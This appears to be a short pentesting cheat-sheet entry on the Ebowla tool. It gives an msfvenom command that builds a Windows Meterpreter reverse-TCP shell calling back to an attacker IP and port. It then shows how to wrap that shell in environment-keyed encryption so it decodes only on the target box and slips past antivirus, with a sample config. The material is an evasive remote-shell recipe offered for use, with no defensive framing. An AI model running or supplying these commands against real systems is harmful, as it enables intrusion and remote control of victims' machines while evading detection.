Tools
Ebowla
We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
An example genetic.config,
...
output_type = GO
...
[[ENV_VAR]]
username = 'morph3'
computername = ''
homepath = ''
homedrive = ''
Number_of_processors = ''
processor_identifier = ''
processor_revision = ''
userdomain = 'acme'
systemdrive = ''
userprofile = ''
path = ''
temp = ''
Nimcrypt2
Last updated